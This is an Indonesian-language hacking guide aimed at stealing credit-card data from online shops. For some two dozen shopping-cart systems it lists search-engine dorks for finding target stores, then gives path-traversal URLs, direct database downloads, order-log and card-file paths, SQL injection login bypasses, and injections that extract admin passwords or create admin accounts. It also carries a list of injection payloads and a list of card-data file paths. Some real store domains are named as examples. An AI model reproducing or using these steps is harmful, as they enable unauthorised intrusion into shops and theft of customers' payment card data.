BUG shopadmin

contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : http://www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
======================================
contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : http://www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
===================
contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : http://www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
===========================
contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : http://www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : http://www.xxxx.com/xxxx/DCShop/orders/orders.txt
=============================
contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : http://www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi http://www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
=========================================
contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : http://www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
http://www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
http://www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
http://www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

===================================================
contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : http://www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
============================================
contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
=========================================================
contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
=========================================
contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
==============================================
contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : http://www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : http://www.xxxxx.com/fpdb/shop.mdb
====================================================
contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : http://www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : http://www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log
=================================================
contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : http://www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : http://www.xxxxxx.org/fpdb/vsproducts.mdb
================================================
contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

setelah bisa login, cari data yang diperlukan
===============================================

Contoh bugs pada bentuk sistem :shop.pl

contoh akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:shop.pl

http://www.domain.com/cgi-local/shop.pl/page=shop.cfg Diamana Config file di letakkan

http://www.domain.com/cgi-local/shop.pl/pa…./../etc/passwd

http://www.domain.com/cgi-local/shop.pl/page=./product_list
===========================================

Buka google, lalu ketikkan inurl:PDG_Cart
CONTOH:
http://www.target.com/cgi-bin/PDG_Cart
lalu loe ketik aja bugsnya untuk mendapatkan login dan password MERCHANT
seperti :
-order.log
-shopper.conf
-Auth.log
-Auth_Admin.log
-authorizenet.log
-dll.

contoh : http://www.target.com/cgi-bin/PDG_Cart/shopper.conf

admin’–
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (’x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (’a’=’a
“) or (”a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (’a’=’a
hi”) or (”a”=”a
‘or”=’
===============================================

rumus manualnya dengan shopdbtest.asp.
contoh :
http://www.target.com/vp-asp dir/shopdbtest.asp atau http://www.target.com/shopdbtest.asp
note : tergantung dimana situs tersebut meletakan file shopdbtest.asp
Jika beruntung kita akan mendapatkan informasi tentang database si admin
database berisi :
– xDatabase
– xDblocation
– xdatabasetype
– xEmail
– xEmailName
– xEmailSubject
– xEmailSystem
– xEmailType
– xOrdernumber
selanjutnya kita liat file dengan ex *.mdb berada.
caranya :
– xDatabase —> untuk nama file *.mdb nya.
– xDblocation —> untuk lokasi file *.mdb nya.
contoh :
– xDatabase = shopping200
– xDblocation = shop
display :
http://www.target.com/shop/shoping200.mdb
setalah itu file shoping200.mdb secara automatis akan terdownload
untuk melihat isi database shoping200.mdb kamu bisa membukanya dengan Ms Access.
============================

Buka google, yahoo, altavista ketikkan :mall2000.cgi”
atau melihatnya dari http://www.ezmall2000.com/
setelah dapat situs yang memakai mall2000.cgi
CONTOH:
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?
nah langkah kedua loe ketik aja ” &page=../ “
kayak gituh seperti ini.
contoh :
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../
lalu loe ketik aja bugsnya untuk mendapatkan list data ato
Credit Card hasil dari transaksi di situs tersebut.
seperti :
-order.log
-error.log
-access.log
-dll.
contoh :
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../order.log
=======================================
Google dork : inurl:”//comersus/”
Contoh:
http://www.target.com/store/xxxx.asp
trus ganti /store/xxxx.asp dengan database/comersus.mdb
Menjadi:
http://www.target.com/database/comersus.mdb
have Fun
==
gunakan dari bugs webshop Sunshop
google dork : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’
=============================================================================================================================

google, yahoo, altavista search engine:
allinurl:
inurl:
allintext:
robots.txt
56 /shopping.mdb
44 /shopdbtest.asp
43 /favicon.ico
35 /admin.mdb
34 /shopping400.mdb
28 /acart2_0.mdb
23 /shopadmin.asp
20 /chevy/index.htm
18 /cvv2.txt
14 /stat????? ??????????? ??????????? ??????????? ??????p.htm
13 /***Shop/logs/cc.txt
12 /ccbill/secure/ccbill.log
11 /config/datasources/expire.mdb
10 /config/datasources/styles.css
10 /shopping450.mdb
10 /acatr2_0/acart2_0.mdb
10 /admin/shopping350.mdb
9 /cgi-bin/add-passwd.cgi
9 /shopdbtest.asp.%204,%200.92,
8 /shopadmin.mdb.
8 /shopping%20.mdb
8 /config/datasources/myorder.mdb
8 /shopping350.mdb
8 /productcart/database/EIPC.mdb
7 /ccbill/secure/styles.css
7 /cgi-bin/shopper.cgi
7 [ ????? ?????? ???? ???? ???? ???? ?????? ??????? ???? ??? ]
7 /shopping400.mdb.
6 /***Shop/templates/cc.txt
6 /config/datasources/brenntagca.mdb
6 //admin.mdb
6 /shop_db/shopping.mdb
5 /shopadmin.asp%20having1=1–
5 /shopadmin.asp.
5 /shopdisplaycategories.asp
5 /chevy
5 /Shopping.mdb
5 /chevy/styles.css
5 /mmex.php
5 /cgi-bin/styles.css
5 /shopping/shopdbtest.asp
5 /cgi-bin/store/Admin_files/myorderlog.txt
5 /cgi-bin/sentry/sentry.cgi
5 /chevy/
4 /acatr2_0//acart2_0.mdb
4 /stats/www.dialacure.com/stats/23-refers.htm
4 /***Shop/templates/profile.htm
4 /stats/www.newbauersflowers.com/stats/06-refers.htm
4 /admin.asp
4 /stats/www.fcpd.org/stats/12-refers.htm
4 /cpanel
4 /shopdisplayproducts.asp
3 /cgi-bin/mastergate/accountcreate.cgi
3 /gtf/
3 /stats/shopadmin.asp
3 /***Shop/logs/styles.css
3 /acatr2_0/styles.css
2 /shopping.mdb/***Shop/logs/cc.txt
2 /shopping.mdb/store/log_files/your_order.log
2 [ ????? ?????? ???? ???? ???? ???? ?????? ??????? ???? ??? ]
2 /news_2003-02-27.htm
2 /stats/photos/protest/kingmarch_01.html
2 /stats/www.friendsofthemall.org/stats/26-refers.htm
2 /media/sentiment.html
2 /stats/photos/protest/styles.css
2 /cgi-bin/mastergate/search.cgi
2 /admin/styles.css
2 /modules/My_eGallery/public/displayCategory.php
2 /stats/styles.css
2 /shopping.mdb/store/log_files/styles.css
2 /venem.htm
2 /shopping.mdb/***Shop/logs/styles.css
1 /media/misplaced.html
1 /updates/20020920.html
1 /topsites/accounts.cgi
1 /adm/members.db
1 /media/notfrontyard.html
1 /media/groundbreaking.html
1 /media/inheritance.html
1 /updates/20020724a.html
1 /about/index.html
1 /media/newsite.html
1 /media/reconsider.html
1 /photos/nevermore/index.html
1 /media/cartoon_wp.html
1 /media/keysupport.html
1 /shopping.mdb/styles.css
1 /cgi-bin/arp/accounts.cgi
1 /cgi-bin/auto/accounts.cgi
1 /mall/index.html
1 /media/ourmonuments.html
1 /chron/public.html
1 /cgibin/top50/accounts.cgi
1 /updates/20020730.html
1 /shopadmin.mdb
1 /media/will.html
1 /media/brawl.html
1 /media/honorvets.html
1 /up
Have Fun